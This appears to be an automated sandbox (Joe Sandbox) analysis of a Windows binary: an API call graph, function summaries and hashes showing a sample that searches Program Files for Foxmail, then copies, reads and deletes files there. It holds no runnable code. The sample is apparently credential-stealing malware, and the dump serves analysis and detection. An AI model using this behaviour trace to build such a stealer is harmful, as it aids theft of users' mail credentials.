6006->6007 6007->5994 6013 33a339cd 6008->6013 6009 33a33a77 6009->6006 6009->6007 6010 33a339ea LoadLibraryExW 6011 33a33a05 GetLastError 6010->6011 6010->6013 6011->6013 6012 33a33a60 FreeLibrary 6012->6013 6013->6009 6013->6010 6013->6012 6014 33a33a38 LoadLibraryExW 6013->6014 6014->6013 6021 33a33856 6015->6021 6017 33a323f1 6017->5873 6018 33a353da 6017->6018 6019 33a35b7a 20 API calls 6018->6019 6020 33a323fd 6019->6020 6020->5871 6020->5872 6022 33a33862 GetLastError 6021->6022 6023 33a3385f 6021->6023 6024 33a33b67 6 API calls 6022->6024 6023->6017 6025 33a33877 6024->6025 6026 33a338dc SetLastError 6025->6026 6027 33a33ba2 6 API calls 6025->6027 6032 33a33896 6025->6032 6026->6017 6028 33a33890 6027->6028 6029 33a338b8 6028->6029 6030 33a33ba2 6 API calls 6028->6030 6028->6032 6031 33a33ba2 6 API calls 6029->6031 6029->6032 6030->6029 6031->6032 6032->6026 6034 33a32485 6033->6034 6064 33a32933 IsProcessorFeaturePresent 6034->6064 6038 33a32496 6039 33a3249a 6038->6039 6075 33a353c8 6038->6075 6039->5877 6042 33a324b1 6042->5877 6131 33a324b5 6044->6131 6046 33a323e5 6046->5884 6047->5886 6051 33a346dc 6048->6051 6049 33a32ada 5 API calls 6050 33a31fad 6049->6050 6050->5883 6052 33a323b3 6050->6052 6051->6049 6053 33a323b8 6052->6053 6054 33a323c1 6053->6054 6055 33a32933 IsProcessorFeaturePresent 6053->6055 6054->5890 6055->6054 6057 33a34698 6056->6057 6058 33a32ada 5 API calls 6057->6058 6059 33a346c1 6058->6059 6059->5883 6061 33a3264e 6060->6061 6062 33a326f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6061->6062 6063 33a32744 6062->6063 6063->5882 6065 33a32491 6064->6065 6066 33a334ea 6065->6066 6067 33a334ef 6066->6067 6086 33a33936 6067->6086 6070 33a334fd 6070->6038 6072 33a33505 6073 33a33510 6072->6073 6100 33a33972 6072->6100 6073->6038 6123 33a37457 6075->6123 6078 33a33529 6079 33a33532 6078->6079 6085 33a33543 6078->6085 6080 33a3391b 6 API calls 6079->6080 6081 33a33537 6080->6081 6082 33a33972 RtlDeleteCriticalSection 6081->6082 6083 33a3353c 6082->6083 6127 33a33c50 6083->6127 6085->6039 6087 33a3393f 6086->6087 6089 33a33968 6087->6089 6090 33a334f9 6087->6090 6104 33a33be0 6087->6104 6091 33a33972 RtlDeleteCriticalSection 6089->6091 6090->6070 6092 33a338e8 6090->6092 6091->6090 6109 33a33af1 6092->6109 6095 33a338fd 6095->6072 6096 33a33ba2 6 API calls 6097 33a3390b 6096->6097 6098 33a33918 6097->6098 6114 33a3391b 6097->6114 6098->6072 6101 33a3399c 6100->6101 6102 33a3397d 6100->6102 6101->6070 6103 33a33987 RtlDeleteCriticalSection 6102->6103 6103->6101 6103->6103 6105 33a33a82 5 API calls 6104->6105 6106 33a33bfa 6105->6106 6107 33a33c18 InitializeCriticalSectionAndSpinCount 6106->6107 6108 33a33c03 6106->6108 6107->6108 6108->6087 6110 33a33a82 5 API calls 6109->6110 6111 33a33b0b 6110->6111 6112 33a33b24 TlsAlloc 6111->6112 6113 33a338f2 6111->6113 6113->6095 6113->6096 6115 33a3392b 6114->6115 6116 33a33925 6114->6116 6115->6095 6118 33a33b2c 6116->6118 6119 33a33a82 5 API calls 6118->6119 6120 33a33b46 6119->6120 6121 33a33b5e TlsFree 6120->6121 6122 33a33b52 6120->6122 6121->6122 6122->6115 6126 33a37470 6123->6126 6124 33a32ada 5 API calls 6125 33a324a3 6124->6125 6125->6042 6125->6078 6126->6124 6128 33a33c7f 6127->6128 6129 33a33c59 6127->6129 6128->6085 6129->6128 6130 33a33c69 FreeLibrary 6129->6130 6130->6129 6132 33a324c4 6131->6132 6133 33a324c8 6131->6133 6132->6046 6134 33a32639 4 API calls 6133->6134 6136 33a324d5 6133->6136 6135 33a32559 6134->6135 6136->6046 6138 33a32451 6137->6138 6139 33a32461 6138->6139 6140 33a32455 6138->6140 6143 33a3246e 6139->6143 6161 33a3499b 6139->6161 6158 33a3527a 6140->6158 6143->5899 6236 33a334c7 RtlInterlockedFlushSList 6146->6236 6148 33a32312 6148->5901 6238 33a3246f 6149->6238 6151 33a320c9 6151->5903 6153 33a32617 6152->6153 6157 33a3262d 6153->6157 6257 33a353ed 6153->6257 6156 33a33529 8 API calls 6156->6157 6157->5905 6183 33a35132 6158->6183 6162 33a349a7 6161->6162 6163 33a349bf 6162->6163 6205 33a34af5 GetModuleHandleW 6162->6205 6214 33a35671 RtlEnterCriticalSection 6163->6214 6170 33a349c7 6177 33a3527a 20 API calls 6170->6177 6178 33a34a3c 6170->6178 6181 33a34a65 6170->6181 6171 33a34a82 6218 33a34ab4 6171->6218 6172 33a34aae 6226 33a3bdc9 6172->6226 6174 33a34669 5 API calls 6180 33a34a54 6174->6180 6175 33a34669 5 API calls 6175->6181 6177->6178 6178->6174 6178->6180 6180->6175 6215 33a34aa5 6181->6215 6186 33a350e1 6183->6186 6185 33a3245f 6185->5899 6187 33a350ed 6186->6187 6194 33a35671 RtlEnterCriticalSection 6187->6194 6189 33a350fb 6195 33a3515a 6189->6195 6193 33a35119 6193->6185 6194->6189 6198 33a35182 6195->6198 6199 33a3517a 6195->6199 6196 33a32ada 5 API calls 6197 33a35108 6196->6197 6201 33a35126 6197->6201 6198->6199 6200 33a3571e 20 API calls 6198->6200 6199->6196 6200->6199 6204 33a356b9 RtlLeaveCriticalSection 6201->6204 6203 33a35130 6203->6193 6204->6203 6206 33a349b3 6205->6206 6206->6163 6207 33a34b39 GetModuleHandleExW 6206->6207 6208 33a34b63 GetProcAddress 6207->6208 6212 33a34b78 6207->6212 6208->6212 6209 33a34b95 6211 33a32ada 5 API calls 6209->6211 6210 33a34b8c FreeLibrary 6210->6209 6213 33a34b9f 6211->6213 6212->6209 6212->6210 6213->6163 6214->6170 6229 33a356b9 RtlLeaveCriticalSection 6215->6229 6217 33a34a7e 6217->6171 6217->6172 6230 33a36025 6218->6230 6221 33a34ae2 6224 33a34b39 8 API calls 6221->6224 6222 33a34ac2 GetPEB 6222->6221 6223 33a34ad2 GetCurrentProcess TerminateProcess 6222->6223 6223->6221 6225 33a34aea ExitProcess 6224->6225 6227 33a32ada 5 API calls 6226->6227 6228 33a3bdd4 6227->6228 6228->6228 6229->6217 6231 33a3604a 6230->6231 6234 33a36040 6230->6234 6232 33a35c45 5 API calls 6231->6232 6232->6234 6233 33a32ada 5 API calls 6235 33a34abe 6233->6235 6234->6233 6235->6221 6235->6222 6237 33a334d7 6236->6237 6237->6148 6243 33a353ff 6238->6243 6241 33a3391b 6 API calls 6242 33a3354d 6241->6242 6242->6151 6246 33a35c2b 6243->6246 6247 33a35c35 6246->6247 6249 33a32476 6246->6249 6250 33a35db2 6247->6250 6249->6241 6251 33a35c45 5 API calls 6250->6251 6252 33a35dd9 6251->6252 6253 33a35df1 TlsFree 6252->6253 6256 33a35de5 6252->6256 6253->6256 6254 33a32ada 5 API calls 6255 33a35e02 6254->6255 6255->6249 6256->6254 6260 33a374da 6257->6260 6261 33a374f3 6260->6261 6262 33a32ada 5 API calls 6261->6262 6263 33a32625 6262->6263 6263->6156 6264->5848 6928 33a336d3 6929 33a336e2 6928->6929 6931 33a336f0 6928->6931 6930 33a32ada 5 API calls 6929->6930 6930->6931 7582 33a35351 7583 33a35360 7582->7583 7584 33a35374 7582->7584 7583->7584 7586 33a3571e 20 API calls 7583->7586 7585 33a3571e 20 API calls 7584->7585 7587 33a35386 7585->7587 7586->7584 7588 33a3571e 20 API calls 7587->7588 7589 33a35399 7588->7589 7590 33a3571e 20 API calls 7589->7590 7591 33a353aa 7590->7591 7592 33a3571e 20 API calls 7591->7592 7593 33a353bb 7592->7593 6826 33a33c90 RtlUnwind 6932 33a34ed7 6933 33a36d60 51 API calls 6932->6933 6934 33a34ee9 6933->6934 6943 33a37153 GetEnvironmentStringsW 6934->6943 6937 33a34ef4 6939 33a3571e 20 API calls 6937->6939 6940 33a34f29 6939->6940 6941 33a34eff 6942 33a3571e 20 API calls 6941->6942 6942->6937 6944 33a3716a 6943->6944 6954 33a371bd 6943->6954 6947 33a37170 WideCharToMultiByte 6944->6947 6945 33a371c6 FreeEnvironmentStringsW 6946 33a34eee 6945->6946 6946->6937 6955 33a34f2f 6946->6955 6948 33a3718c 6947->6948 6947->6954 6949 33a356d0 21 API calls 6948->6949 6950 33a37192 6949->6950 6951 33a371af 6950->6951 6952 33a37199 WideCharToMultiByte 6950->6952 6953 33a3571e 20 API calls 6951->6953 6952->6951 6953->6954 6954->6945 6954->6946 6956 33a34f44 6955->6956 6957 33a3637b 20 API calls 6956->6957 6968 33a34f6b 6957->6968 6958 33a34fcf 6959 33a3571e 20 API calls 6958->6959 6960 33a34fe9 6959->6960 6960->6941 6961 33a3637b 20 API calls 6961->6968 6962 33a34fd1 6963 33a35000 20 API calls 6962->6963 6965 33a34fd7 6963->6965 6966 33a3571e 20 API calls 6965->6966 6966->6958 6967 33a34ff3 6969 33a362bc 11 API calls 6967->6969 6968->6958 6968->6961 6968->6962 6968->6967 6970 33a3571e 20 API calls 6968->6970 6972 33a3544d 6968->6972 6971 33a34fff 6969->6971 6970->6968 6973 33a35468 6972->6973 6974 33a3545a 6972->6974 6975 33a36368 20 API calls 6973->6975 6974->6973 6977 33a3547f 6974->6977 6980 33a35470 6975->6980 6976 33a362ac 26 API calls 6978 33a3547a 6976->6978 6977->6978 6979 33a36368 20 API calls 6977->6979 6978->6968 6979->6980 6980->6976 6981 33a373d5 6982 33a373e1 6981->6982 6993 33a35671 RtlEnterCriticalSection 6982->6993 6984 33a373e8 6994 33a38be3 6984->6994 6986 33a373f7 6992 33a37406 6986->6992 7007 33a37269 GetStartupInfoW 6986->7007 6989 33a37417 7018 33a37422 6992->7018 6993->6984 6995 33a38bef 6994->6995 6996 33a38c13 6995->6996 6997 33a38bfc 6995->6997 7021 33a35671 RtlEnterCriticalSection 6996->7021 6999 33a36368 20 API calls 6997->6999 7000 33a38c01 6999->7000 7001 33a362ac 26 API calls 7000->7001 7003 33a38c0b 7001->7003 7002 33a38c4b 7029 33a38c72 7002->7029 7003->6986 7004 33a38c1f 7004->7002 7022 33a38b34 7004->7022 7008 33a37286 7007->7008 7009 33a37318 7007->7009 7008->7009 7010 33a38be3 27 API calls 7008->7010 7013 33a3731f 7009->7013 7011 33a372af 7010->7011 7011->7009 7012 33a372dd GetFileType 7011->7012 7012->7011 7017 33a37326 7013->7017 7014 33a37369 GetStdHandle 7014->7017 7015 33a373d1 7015->6992 7016 33a3737c GetFileType 7016->7017 7017->7014 7017->7015 7017->7016 7033 33a356b9 RtlLeaveCriticalSection 7018->7033 7020 33a37429 7020->6989 7021->7004 7023 33a3637b 20 API calls 7022->7023 7025 33a38b46 7023->7025 7024 33a3571e 20 API calls 7026 33a38ba5 7024->7026 7027 33a35eb7 11 API calls 7025->7027 7028 33a38b53 7025->7028 7026->7004 7027->7025 7028->7024 7032 33a356b9 RtlLeaveCriticalSection 7029->7032 7031 33a38c79 7031->7003 7032->7031 7033->7020 5605 33a31c5b 5606 33a31c6b 5605->5606 5609 33a312ee 5606->5609 5608 33a31c87 5610 33a31324 5609->5610 5611 33a313b7 GetEnvironmentVariableW 5610->5611 5635 33a310f1 5611->5635 5614 33a310f1 57 API calls 5615 33a31465 5614->5615 5616 33a310f1 57 API calls 5615->5616 5617 33a31479 5616->5617 5618 33a310f1 57 API calls 5617->5618 5619 33a3148d 5618->5619 5620 33a310f1 57 API calls 5619->5620 5621 33a314a1 5620->5621 5622 33a310f1 57 API calls 5621->5622 5623 33a314b5 lstrlenW 5622->5623 5624 33a314d9 lstrlenW 5623->5624 5634 33a314d2 5623->5634 5625 33a310f1 57 API calls 5624->5625 5626 33a31501 lstrlenW lstrcatW 5625->5626 5627 33a310f1 57 API calls 5626->5627 5628 33a31539 lstrlenW lstrcatW 5627->5628 5629 33a310f1 57 API calls 5628->5629 5630 33a3156b lstrlenW lstrcatW 5629->5630 5631 33a310f1 57 API calls 5630->5631 5632 33a3159d lstrlenW lstrcatW 5631->5632 5633 33a310f1 57 API calls 5632->5633 5633->5634 5634->5608 5636 33a31118 5635->5636 5637 33a31129 lstrlenW 5636->5637 5648 33a32c40 5637->5648 5640 33a31177 lstrlenW FindFirstFileW 5642 33a311e1 5640->5642 5643 33a311a0 5640->5643 5641 33a31168 lstrlenW 5641->5640 5642->5614 5644 33a311c7 FindNextFileW 5643->5644 5645 33a311aa 5643->5645 5644->5643 5647 33a311da FindClose 5644->5647 5645->5644 5650 33a31000 5645->5650 5647->5642 5649 33a31148 lstrcatW lstrlenW 5648->5649 5649->5640 5649->5641 5651 33a31022 5650->5651 5652 33a310af 5651->5652 5653 33a3102f lstrcatW lstrlenW 5651->5653 5656 33a310b5 lstrlenW 5652->5656 5666 33a310ad 5652->5666 5654 33a3106b lstrlenW 5653->5654 5655 33a3105a lstrlenW 5653->5655 5667 33a31e89 lstrlenW 5654->5667 5655->5654 5681 33a31e16 5656->5681 5659 33a31088 GetFileAttributesW 5661 33a3109c 5659->5661 5659->5666 5660 33a310ca 5662 33a31e89 5 API calls 5660->5662 5660->5666 5661->5666 5673 33a3173a 5661->5673 5663 33a310df 5662->5663 5686 33a311ea 5663->5686 5666->5645 5668 33a32c40 5667->5668 5669 33a31ea7 lstrcatW lstrlenW 5668->5669 5670 33a31ec2 5669->5670 5671 33a31ed1 lstrcatW 5669->5671 5670->5671 5672 33a31ec7 lstrlenW 5670->5672 5671->5659 5672->5671 5674 33a31747 5673->5674 5701 33a31cca 5674->5701 5678 33a3199f 5678->5666 5679 33a31824 5679->5678 5721 33a315da 5679->5721 5682 33a31e29 5681->5682 5685 33a31e4c 5681->5685 5683 33a31e2d lstrlenW 5682->5683 5682->5685 5684 33a31e3f lstrlenW 5683->5684 5683->5685 5684->5685 5685->5660 5687 33a3120e 5686->5687 5688 33a31e89 5 API calls 5687->5688 5689 33a31220 GetFileAttributesW 5688->5689 5690 33a31246 5689->5690 5691 33a31235 5689->5691 5692 33a31e89 5 API calls 5690->5692 5691->5690 5693 33a3173a 35 API calls 5691->5693 5694 33a31258 5692->5694 5693->5690 5695 33a310f1 56 API calls 5694->5695 5696 33a3126d 5695->5696 5697 33a31e89 5 API calls 5696->5697 5698 33a3127f 5697->5698 5699 33a310f1 56 API calls 5698->5699 5700 33a312e6 5699->5700 5700->5666 5702 33a31cf1 5701->5702 5703 33a31d0f CopyFileW CreateFileW 5702->5703 5704 33a31d55 GetFileSize 5703->5704 5705 33a31d44 DeleteFileW 5703->5705 5706 33a31ede 22 API calls 5704->5706 5710 33a31808 5705->5710 5707 33a31d66 ReadFile 5706->5707 5708 33a31d94 CloseHandle DeleteFileW 5707->5708 5709 33a31d7d CloseHandle DeleteFileW 5707->5709 5708->5710 5709->5710 5710->5678 5711 33a31ede 5710->5711 5713 33a3222f 5711->5713 5714 33a3224e 5713->5714 5717 33a32250 5713->5717 5729 33a3474f 5713->5729 5734 33a347e5 5713->5734 5714->5679 5716 33a32908 5718 33a335d2 RaiseException 5716->5718 5717->5716 5741 33a335d2 5717->5741 5720 33a32925 5718->5720 5720->5679 5722 33a3160c 5721->5722 5723 33a3163c lstrlenW 5722->5723 5829 33a31c9d 5723->5829 5725 33a31655 lstrcatW lstrlenW 5726 33a31678 5725->5726 5727 33a31693 5726->5727 5728 33a3167e lstrcatW 5726->5728 5727->5679 5728->5727 5744 33a34793 5729->5744 5731 33a34765 5750 33a32ada 5731->5750 5733 33a3478f 5733->5713 5740 33a356d0 5734->5740 5735 33a3570e 5763 33a36368 5735->5763 5737 33a356f9 RtlAllocateHeap 5738 33a3570c 5737->5738 5737->5740 5738->5713 5739 33a3474f 7 API calls 5739->5740 5740->5735 5740->5737 5740->5739 5743 33a335f2 RaiseException 5741->5743 5743->5716 5745 33a3479f 5744->5745 5757 33a35671 RtlEnterCriticalSection 5745->5757 5747 33a347aa 5758 33a347dc 5747->5758 5749 33a347d1 5749->5731 5751 33a32ae3 5750->5751 5752 33a32ae5 IsProcessorFeaturePresent 5750->5752 5751->5733 5754 33a32b58 5752->5754 5762 33a32b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5754->5762 5756 33a32c3b 5756->5733 5757->5747 5761 33a356b9 RtlLeaveCriticalSection 5758->5761 5760 33a347e3 5760->5749 5761->5760 5762->5756 5766 33a35b7a GetLastError 5763->5766 5767 33a35b93 5766->5767 5768 33a35b99 5766->5768 5785 33a35e08 5767->5785 5772 33a35bf0 SetLastError 5768->5772 5792 33a3637b 5768->5792 5774 33a35bf9 5772->5774 5773 33a35bb3 5799 33a3571e 5773->5799 5774->5738 5778 33a35bcf 5812 33a3593c 5778->5812 5779 33a35bb9 5781 33a35be7 SetLastError 5779->5781 5781->5774 5783 33a3571e 17 API calls 5784 33a35be0 5783->5784 5784->5772 5784->5781 5817 33a35c45 5785->5817 5787 33a35e2f 5788 33a35e47 TlsGetValue 5787->5788 5789 33a35e3b 5787->5789 5788->5789 5790 33a32ada 5 API calls 5789->5790 5791 33a35e58 5790->5791 5791->5768 5797 33a36388 5792->5797 5793 33a363c8 5795 33a36368 19 API calls 5793->5795 5794 33a363b3 RtlAllocateHeap 5796 33a35bab 5794->5796 5794->5797 5795->5796 5796->5773 5805 33a35e5e 5796->5805 5797->5793 5797->5794 5798 33a3474f 7 API calls 5797->5798 5798->5797 5800 33a35752 5799->5800 5801 33a35729 RtlFreeHeap 5799->5801 5800->5779 5801->5800 5802 33a3573e 5801->5802 5803 33a36368 18 API calls 5802->5803 5804 33a35744 GetLastError 5803->5804 5804->5800 5806 33a35c45 5 API calls 5805->5806 5807 33a35e85 5806->5807 5808 33a35ea0 TlsSetValue 5807->5808 5809 33a35e94 5807->5809 5808->5809 5810 33a32ada 5 API calls 5809->5810 5811 33a35bc8 5810->5811 5811->5773 5811->5778 5823 33a35914 5812->5823 5819 33a35c71 5817->5819 5822 33a35c75 5817->5822 5818 33a35ce1 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5818->5819 5819->5818 5821 33a35c95 5819->5821 5819->5822 5820 33a35ca1 GetProcAddress 5820->5822 5821->5820 5821->5822 5822->5787 5824 33a35854 RtlEnterCriticalSection RtlLeaveCriticalSection 5823->5824 5825 33a35938 5824->5825 5826 33a358c4 5825->5826 5827 33a35758 20 API calls 5826->5827 5828 33a358e8 5827->5828 5828->5783 5830 33a31ca6 5829->5830 5830->5725 6827 33a34a9a 6828 33a35411 38 API calls 6827->6828 6829 33a34aa2 6828->6829 7034 33a34bdd 7035 33a34c08 7034->7035 7036 33a34bec 7034->7036 7038 33a36d60 51 API calls 7035->7038 7036->7035 7037 33a34bf2 7036->7037 7039 33a36368 20 API calls 7037->7039 7040 33a34c0f GetModuleFileNameA 7038->7040 7041 33a34bf7 7039->7041 7042 33a34c33 7040->7042 7043 33a362ac 26 API calls 7041->7043 7057 33a34d01 7042->7057 7045 33a34c01 7043->7045 7047 33a34e76 20 API calls 7048 33a34c5d 7047->7048 7049 33a34c72 7048->7049 7050 33a34c66 7048->7050 7052 33a34d01 38 API calls 7049->7052 7051 33a36368 20 API calls 7050->7051 7056 33a34c6b 7051->7056 7054 33a34c88 7052->7054 7053 33a3571e 20 API calls 7053->7045 7055 33a3571e 20 API calls 7054->7055 7054->7056 7055->7056 7056->7053 7059 33a34d26 7057->7059 7061 33a34d86 7059->7061 7063 33a370eb 7059->7063 7060 33a34c50 7060->7047 7061->7060 7062 33a370eb 38 API calls 7061->7062 7062->7061 7066 33a37092 7063->7066 7067 33a354a7 38 API calls 7066->7067 7068 33a370a6 7067->7068 7068->7059 7111 33a3281c 7114 33a32882 7111->7114 7117 33a33550 7114->7117 7116 33a3282a 7118 33a3355d 7117->7118 7121 33a3358a 7117->7121 7119 33a347e5 21 API calls 7118->7119 7118->7121 7120 33a3357a 7119->7120 7120->7121 7122 33a3544d 26 API calls 7120->7122 7121->7116 7122->7121

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 33A31137
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33A31151
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A3115C
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A3116D
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A3117C
                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33A31193
                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 33A311D0
                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 33A311DB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1083526818-0
                                                                                                                                                                                                                                    • Opcode ID: d14efd199adda5cf301848294d29c856705d46c41d0e0f480a99ccadce550634
                                                                                                                                                                                                                                    • Instruction ID: c8dd5ca188062ca01f157e1ee84b6c0fd5ad96cb5451de3c2ac068d01c03ec4e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d14efd199adda5cf301848294d29c856705d46c41d0e0f480a99ccadce550634
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1219172904308ABD720EA64DC4DFDBBBDCEF85724F04092EB959D3190EB30D6068796

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,?), ref: 33A31434
                                                                                                                                                                                                                                      • Part of subcall function 33A310F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 33A31137
                                                                                                                                                                                                                                      • Part of subcall function 33A310F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33A31151
                                                                                                                                                                                                                                      • Part of subcall function 33A310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A3115C
                                                                                                                                                                                                                                      • Part of subcall function 33A310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A3116D
                                                                                                                                                                                                                                      • Part of subcall function 33A310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A3117C
                                                                                                                                                                                                                                      • Part of subcall function 33A310F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33A31193
                                                                                                                                                                                                                                      • Part of subcall function 33A310F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 33A311D0
                                                                                                                                                                                                                                      • Part of subcall function 33A310F1: FindClose.KERNEL32(00000000), ref: 33A311DB
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 33A314C5
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 33A314E0
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 33A3150F
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 33A31521
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 33A31547
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 33A31553
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 33A31579
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 33A31585
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 33A315AB
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 33A315B7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                                    • API String ID: 672098462-2938083778
                                                                                                                                                                                                                                    • Opcode ID: 49101c8df342f2c75a824c9133c18bc25b2246895f71f0ec5e565e69fb73a46c
                                                                                                                                                                                                                                    • Instruction ID: 4b8dee71eff8932d65e3ddc3f09d0cc6540e9f1b42441301f80eeb7e12c458b7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49101c8df342f2c75a824c9133c18bc25b2246895f71f0ec5e565e69fb73a46c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A81E171A01358AADB20DBA5DC85FEF7379EF85710F00059BF908E7290EAB15A85CF94

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(33A3C7DD), ref: 33A3C7E6
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,33A3C7DD), ref: 33A3C838
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 33A3C860
                                                                                                                                                                                                                                      • Part of subcall function 33A3C803: GetProcAddress.KERNEL32(00000000,33A3C7F4), ref: 33A3C804
                                                                                                                                                                                                                                      • Part of subcall function 33A3C803: VirtualProtect.KERNEL32(?,?,?,?,00000000,00000000,33A3C7F4,33A3C7DD), ref: 33A3C816
                                                                                                                                                                                                                                      • Part of subcall function 33A3C803: VirtualProtect.KERNEL32(?,?,?,?,?,00000000,00000000,33A3C7F4,33A3C7DD), ref: 33A3C82A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                                                                    • Opcode ID: 0d40a1f1873badcc7abd17615b577454aacf23acbaf30437919bc32e48719f70
                                                                                                                                                                                                                                    • Instruction ID: 50bb37d834b8992d9a71d2785058cb8720d4a0964ef0df259d360e6c0eb15b25
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d40a1f1873badcc7abd17615b577454aacf23acbaf30437919bc32e48719f70
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1011E154B4735138FB115A780C01AAA6FDCDB277B0F18075BAD40D6692E9A5870283E6

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 79 33a3c7c4-33a3c7f6 call 33a3c7e6 82 33a3c7f8 79->82 83 33a3c86c 79->83 85 33a3c85b-33a3c85e 82->85 86 33a3c7fa-33a3c7fc 82->86 84 33a3c86d-33a3c86e 83->84 88 33a3c870 84->88 89 33a3c866-33a3c86b 84->89 87 33a3c85f-33a3c860 GetProcAddress 85->87 86->84 90 33a3c7fe 86->90 91 33a3c865 87->91 93 33a3c849-33a3c84c 88->93 89->83 90->91 92 33a3c800-33a3c80b GetProcAddress 90->92 91->89 96 33a3c82d 92->96 97 33a3c80d-33a3c81a VirtualProtect 92->97 94 33a3c82f-33a3c833 93->94 95 33a3c84e-33a3c850 93->95 102 33a3c872 LdrInitializeThunk 94->102 103 33a3c835-33a3c83d GetModuleHandleA 94->103 98 33a3c852-33a3c854 95->98 99 33a3c856-33a3c85a 95->99 96->94 100 33a3c82c 97->100 101 33a3c81c-33a3c82a VirtualProtect 97->101 98->87 99->85 100->96 101->100 104 33a3c83f-33a3c847 103->104 104->93 104->104
